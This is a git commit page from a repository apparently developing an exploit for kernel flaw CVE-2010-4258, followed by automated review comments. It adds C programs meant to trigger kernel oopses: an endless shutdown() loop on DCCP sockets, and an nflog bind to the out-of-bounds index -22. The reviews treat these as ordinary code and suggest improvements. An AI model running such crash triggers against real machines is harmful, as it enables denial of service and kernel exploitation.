author | Jason A. Donenfeld <Jason@zx2c4.com> | 2011-03-09 19:35:19 -0500 |
---|---|---|
committer | Jason A. Donenfeld <Jason@zx2c4.com> | 2011-03-09 19:35:19 -0500 |
commit | 48c8d5c5d0050a4dd6fa8a8f7d0ac76acc5b4e97 (patch) | |
tree | 4366892d0ba7c1a8e4b7eeaf8269e34638c56dbd | |
parent | Usleep (diff) | |
download | CVE-2010-4258-48c8d5c5d0050a4dd6fa8a8f7d0ac76acc5b4e97.tar.xz CVE-2010-4258-48c8d5c5d0050a4dd6fa8a8f7d0ac76acc5b4e97.zip |
Add netfilter oops test.
-rw-r--r-- | dccp_test.c | 22 | ||||
-rw-r--r-- | netfilter_test.c | 23 |
2 files changed, 36 insertions, 9 deletions
diff --git a/dccp_test.c b/dccp_test.c
index 786f869..6c60d7c 100644
--- a/dccp_test.c
+++ b/dccp_test.c
@@ -11,7 +11,7 @@ int main()
 memset(&laddr, 0, sizeof(laddr));
 laddr.sin_family = AF_INET;
 laddr.sin_addr.s_addr = inet_addr("127.0.0.1");
- laddr.sin_port = htons(31337);
+ laddr.sin_port = htons(31347);
 if (fork()) {
 int listener = socket(PF_INET, SOCK_DCCP, IPPROTO_DCCP);
 if (listener < 0) {
@@ -43,10 +43,12 @@ int main()
 perror(NULL);
 return -1;
 }
- if (close(client) < 0) {
- printf("[-] Could not close connection.\n");
- perror(NULL);
- return -1;
+ for (;;) {
+ if (shutdown(client, SHUT_RDWR) < 0) {
+ //printf("[-] Could not close connection.\n");
+ perror(NULL);
+ //return -1;
+ }
 }
 } else {
 usleep(100);
@@ -67,10 +69,12 @@ int main()
 perror(NULL);
 return -1;
 }
- if (close(hello) < 0) {
- printf("[-] Could not close connection.\n");
- perror(NULL);
- return -1;
+ for (;;) {
+ if (shutdown(hello, SHUT_RDWR) < 0) {
+ //printf("[-] Could not close connection.\n");
+ perror(NULL);
+ //return -1;
+ }
 }
 }
diff --git a/netfilter_test.c b/netfilter_test.c
new file mode 100644
index 0000000..fbd56d4
--- /dev/null
+++ b/netfilter_test.c
@@ -0,0 +1,23 @@
+#include <stdio.h>
+#include <netinet/in.h>
+#include <libnetfilter_log/libnetfilter_log.h>
+
+int main(int argc, char *argv[])
+{
+ struct nflog_handle *h;
+ h = nflog_open();
+ if (!h) {
+ printf("[-] Could not open netfilter log.\n");
+ return -1;
+ }
+ printf("[+] Unbinding handle.\n");
+ nflog_unbind_pf(h, AF_INET);
+ printf("[+] Binding handle to out of bounds index.\n");
+ nflog_bind_pf(h, -22); /* expects >= 0? */
+ printf("[+] Unbinding handle, now bound to out of bounds index.\n");
+ nflog_unbind_pf(h, AF_INET);
+ printf("[+] Closing handle.\n");
+ nflog_close(h);
+ printf("[-] Did not trigger oops.\n");
+ return 0;
+} |
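Review bot: The `for (;;)` loop added in the `@@ -43,10 +43,12 @@` hunk of dccp_test.c has no exit condition and no delay, so once `shutdown(client, SHUT_RDWR)` starts failing the process spins and `perror(NULL)` writes to stderr without end; the `@@ -67,10 +69,12 @@` hunk repeats the same pattern with `hello`. With `close()` removed, neither descriptor is released and nothing after the loop can run. If the repetition is deliberate it needs a one-line comment above the loop saying why shutdown is called repeatedly, and the commented-out `//printf(...)` and `//return -1;` lines should be deleted rather than kept as dead code. main() begins and ends outside both hunks, so how the two processes are meant to terminate is not visible here.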
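Review bot: In the new netfilter_test.c the return values of `nflog_unbind_pf()` and `nflog_bind_pf()` are discarded, so every `[+]` progress line prints even when the call is refused, and the closing `[-] Did not trigger oops.` cannot distinguish a kernel that validated and rejected the family value from a run that failed for lack of privilege. Checking the result, for example `if (nflog_bind_pf(h, -22) < 0) fprintf(stderr, "[-] bind_pf rejected\n");`, makes a negative outcome readable as evidence that the check is in place. The literal `-22` should carry a comment stating what it is intended to select instead of the open question `/* expects >= 0? */`. `argc` and `argv` are unused, so `int main(void)` is enough.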